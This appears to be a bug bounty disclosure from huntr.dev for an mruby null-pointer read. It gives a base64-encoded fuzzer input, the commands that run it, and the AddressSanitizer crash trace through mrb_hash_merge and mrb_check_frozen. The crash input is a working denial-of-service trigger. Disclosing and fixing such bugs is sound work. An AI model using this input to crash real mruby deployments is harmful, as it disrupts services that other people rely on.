in mruby/mruby

2022-02-1608:06:51

p0cas

www.huntr.dev

mruby

addresssanitizer

vulnerability

read memory access

segv

bug bounty

EPSS

0.001

Percentile

33.4%

JSON

Description

commit ecb28f4bf463483cf914c799d086b0cfff997aee

Proof of Concept

⚡ root@pocas  ~/fuzz/mruby2   master ±  echo "P2MKWyoqMCwqKjgsbTowXQSAPRpbAAB7" | base64 -d &gt; poc1
⚡ root@pocas  ~/fuzz/mruby2   master ±  ./bin/mruby poc1
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2524121==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000011 (pc 0x00000059fd79 bp 0x7ffc5b998bd0 sp 0x7ffc5b997c50 T0)
==2524121==The signal is caused by a READ memory access.
==2524121==Hint: address points to the zero page.
    #0 0x59fd79 in mrb_check_frozen /root/fuzz/mruby2/include/mruby.h:1418:7
    #1 0x59fd79 in hash_modify /root/fuzz/mruby2/src/hash.c:1154:3
    #2 0x59fd79 in mrb_hash_merge /root/fuzz/mruby2/src/hash.c:1734:3
    #3 0x4df12f in mrb_vm_exec /root/fuzz/mruby2/src/vm.c:2780:7
    #4 0x4d77de in mrb_vm_run /root/fuzz/mruby2/src/vm.c:1128:12
    #5 0x5e9602 in mrb_load_exec /root/fuzz/mruby2/mrbgems/mruby-compiler/core/parse.y:6883:7
    #6 0x5ea4f3 in mrb_load_detect_file_cxt /root/fuzz/mruby2/mrbgems/mruby-compiler/core/parse.y:6926:12
    #7 0x4cb88b in main /root/fuzz/mruby2/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357:11
    #8 0x7ff4daabd564 in __libc_start_main csu/../csu/libc-start.c:332:16
    #9 0x41d7ad in _start (/root/fuzz/mruby2/bin/mruby+0x41d7ad)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/fuzz/mruby2/include/mruby.h:1418:7 in mrb_check_frozen
==2524121==ABORTING